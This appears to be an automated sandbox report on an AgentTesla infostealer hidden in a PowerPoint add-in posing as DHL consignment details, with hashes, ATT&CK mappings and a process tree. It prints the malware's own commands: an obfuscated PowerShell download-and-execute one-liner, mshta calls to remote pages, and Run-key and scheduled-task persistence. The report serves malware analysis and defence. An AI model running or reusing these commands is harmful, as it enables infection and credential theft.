agenttesla | 6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674

General

Target

DHL Consignment Details.ppam
Size

8KB
MD5

e49c885d3236afa32adef83e8a201573
SHA1

f8e63da458adee3ece85529ddeba477a07087430
SHA256

6f931b139cdf0652432a133e3beef1ff6136571c8d953f3eee28316bbf9c5674
SHA512

7339c4c43193686e737c6c4dbfcaf7778195e2c51d057436426651c1a62375196f393b69e6abcffa1ca2fc75c4117fb719b5b51b3eb4bd4335c85a8d08f0e3ff

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	928	3576	mshta.exe	POWERPNT.EXE

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2520-316-0x000000000043751E-mapping.dmp	family_agenttesla
behavioral1/memory/664-383-0x000000000043751E-mapping.dmp	family_agenttesla
behavioral1/memory/664-389-0x00000000056D0000-0x0000000005BCE000-memory.dmp	family_agenttesla

Blocklisted process makes network request 15 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
40	928	mshta.exe
41	928	mshta.exe
43	928	mshta.exe
45	928	mshta.exe
47	928	mshta.exe
49	928	mshta.exe
51	928	mshta.exe
53	928	mshta.exe
55	928	mshta.exe
56	928	mshta.exe
58	928	mshta.exe
60	928	mshta.exe
62	928	mshta.exe
63	928	mshta.exe
65	3324	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

jsc.exeRegAsm.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%1230948@gagamutakakachota.blogspot.com/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%1230948@machearkalonikahdi.blogspot.com/p/12.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%1230948@migimigichuchuchacha.blogspot.com/p/12.html\""	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 3324 set thread context of 2520	3324	powershell.exe	jsc.exe
PID 3324 set thread context of 664	3324	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

808 schtasks.exe

pid	process
808	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3508 taskkill.exe
3660 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

3576 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid process

3052 dw20.exe
3052 dw20.exe
3324 powershell.exe
3324 powershell.exe
3324 powershell.exe
2520 jsc.exe
2520 jsc.exe
664 RegAsm.exe
664 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

RegAsm.exe

pid process

664 RegAsm.exe

pid	process
3508	taskkill.exe
3660	taskkill.exe

pid	process
3576	POWERPNT.EXE

pid	process
3052	dw20.exe
3052	dw20.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe
2520	jsc.exe
2520	jsc.exe
664	RegAsm.exe
664	RegAsm.exe

pid	process
664	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	3508	taskkill.exe
Token: SeDebugPrivilege	3660	taskkill.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	2520	jsc.exe
Token: SeDebugPrivilege	664	RegAsm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

POWERPNT.EXEjsc.exeRegAsm.exe

pid process

3576 POWERPNT.EXE
3576 POWERPNT.EXE
3576 POWERPNT.EXE
2520 jsc.exe
664 RegAsm.exe

pid	process
3576	POWERPNT.EXE
3576	POWERPNT.EXE
3576	POWERPNT.EXE
2520	jsc.exe
664	RegAsm.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 3576 wrote to memory of 928	3576	POWERPNT.EXE	mshta.exe
PID 3576 wrote to memory of 928	3576	POWERPNT.EXE	mshta.exe
PID 928 wrote to memory of 3508	928	mshta.exe	taskkill.exe
PID 928 wrote to memory of 3508	928	mshta.exe	taskkill.exe
PID 928 wrote to memory of 3660	928	mshta.exe	taskkill.exe
PID 928 wrote to memory of 3660	928	mshta.exe	taskkill.exe
PID 928 wrote to memory of 808	928	mshta.exe	schtasks.exe
PID 928 wrote to memory of 808	928	mshta.exe	schtasks.exe
PID 928 wrote to memory of 3324	928	mshta.exe	powershell.exe
PID 928 wrote to memory of 3324	928	mshta.exe	powershell.exe
PID 928 wrote to memory of 3052	928	mshta.exe	dw20.exe
PID 928 wrote to memory of 3052	928	mshta.exe	dw20.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 2520	3324	powershell.exe	jsc.exe
PID 3324 wrote to memory of 1268	3324	powershell.exe	csc.exe
PID 3324 wrote to memory of 1268	3324	powershell.exe	csc.exe
PID 1268 wrote to memory of 4008	1268	csc.exe	cvtres.exe
PID 1268 wrote to memory of 4008	1268	csc.exe	cvtres.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe
PID 3324 wrote to memory of 664	3324	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

outlook_win_path 1 IoCs

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DHL Consignment Details.ppam" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3576

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdwdmlrufhjwijjd
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:928

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im winword.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Excel.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3660

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%1230948@kumakahchachi.blogspot.com/p/12.html\""
3⤵
- Creates scheduled task(s)
PID:808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e7293c57732f4f278d939202241e0b25.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_cf83a79c40724f5c8e18bb53de0f0399.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3324

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
PID:2520

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36BC.tmp" "c:\Users\Admin\AppData\Local\Temp\f0cdxpot\CSC9B77D845C3004C18AFA9F28466A9A068.TMP"
5⤵
PID:4008

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_win_path
PID:664

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2856
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3052

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Data from Local System

3

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES36BC.tmp
MD5
18e38ab8064ecc2fdf15fb42bbe67bda

SHA1
0f07e0c4cfefe6063b80cd7c58282aff5ba17897

SHA256
e7c514c909b392554ef29746725cbbfa94b8817009bbe2fabddb66a6c9af5920

SHA512
0bf9b4b186bfb8b9457e00e3f385bc926feb84438cf8be1ee3762f510b216a59025319ab314a224404cc6f6a46a06b605b8fc7e562514d81c99d16ded2e6c25a

Download Submit
C:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.dll
MD5
87780e1e819608ad36543ca54f16ad4e

SHA1
f6c0556035865fb5a7e3ca3aba9a3a81a0e63156

SHA256
5eba40194df77cc79a6911ca0336edff2e10b661131782e7256dd0d708c863a7

SHA512
fbcc9c0adaa479586b557cafc9feb59f5374bc420db108d7c0af53bd1d7948e988143960cc74c48eba8bb95fbd0ed567c1f6994887c2becd45c63e9966694247

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f0cdxpot\CSC9B77D845C3004C18AFA9F28466A9A068.TMP
MD5
aeafc7bf342fdde5e80de6a73df16eea

SHA1
a259cc402987a1e43bd996b3391fded1cf1ea3e1

SHA256
8e8aecd99a9c8ba39fc3c7bb4dafae50cd409bba3652b753560fdef2add011e2

SHA512
0100b8cb51a4639ca7e7b8119c9f83ce0c29d668fbaf91a2e4e333e371d9eaa8532c844c586ba8546c3c337d0082cf78cf642d9ffab0cf7c123e5de4f86aad1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.0.cs
MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f0cdxpot\f0cdxpot.cmdline
MD5
9273eb1f3e458e1f069dff3a29aaef15

SHA1
019356c02e79df4aa2d16debe6308650232d6a68

SHA256
2a5493a8c06d0e140f650ceba9e2490e7d58512d32b67929df7c388122026982

SHA512
be54468a5b93286c5f4ce0763b78359b6809dfc5c80432422cf3b7dd53f2b4e74cbc3db63cb257ca3418a071a9e0e0243e307be3cfed6af6c20b6849906fad0a

Download Submit
memory/664-383-0x000000000043751E-mapping.dmp

Download
memory/664-389-0x00000000056D0000-0x0000000005BCE000-memory.dmp

Filesize
5.0MB

Download
memory/664-399-0x00000000056D0000-0x0000000005BCE000-memory.dmp

Filesize
5.0MB

Download
memory/808-292-0x0000000000000000-mapping.dmp

Download
memory/928-268-0x0000000000000000-mapping.dmp

Download
memory/1268-373-0x0000000000000000-mapping.dmp

Download
memory/2520-398-0x00000000056B0000-0x0000000005BAE000-memory.dmp

Filesize
5.0MB

Download
memory/2520-376-0x00000000056B0000-0x0000000005BAE000-memory.dmp

Filesize
5.0MB

Download
memory/2520-316-0x000000000043751E-mapping.dmp

Download
memory/3052-294-0x0000000000000000-mapping.dmp

Download
memory/3324-293-0x0000000000000000-mapping.dmp

Download
memory/3324-307-0x0000019328F00000-0x0000019328F02000-memory.dmp

Filesize
8KB

Download
memory/3324-309-0x0000019328F03000-0x0000019328F05000-memory.dmp

Filesize
8KB

Download
memory/3324-311-0x0000019328F06000-0x0000019328F08000-memory.dmp

Filesize
8KB

Download
memory/3508-290-0x0000000000000000-mapping.dmp

Download
memory/3576-130-0x00007FF7F8120000-0x00007FF7F8130000-memory.dmp

Filesize
64KB

Download
memory/3576-257-0x000001722D4E0000-0x000001722D4E4000-memory.dmp

Filesize
16KB

Download
memory/3576-116-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

Filesize
64KB

Download
memory/3576-129-0x00007FF7F8120000-0x00007FF7F8130000-memory.dmp

Filesize
64KB

Download
memory/3576-123-0x000001721CDF0000-0x000001721CDF2000-memory.dmp

Filesize
8KB

Download
memory/3576-122-0x000001721CDF0000-0x000001721CDF2000-memory.dmp

Filesize
8KB

Download
memory/3576-121-0x000001721CDF0000-0x000001721CDF2000-memory.dmp

Filesize
8KB

Download
memory/3576-120-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

Filesize
64KB

Download
memory/3576-119-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

Filesize
64KB

Download
memory/3576-118-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

Filesize
64KB

Download
memory/3576-117-0x00007FF7FB410000-0x00007FF7FB420000-memory.dmp

Filesize
64KB

Download
memory/3660-291-0x0000000000000000-mapping.dmp

Download
memory/4008-377-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads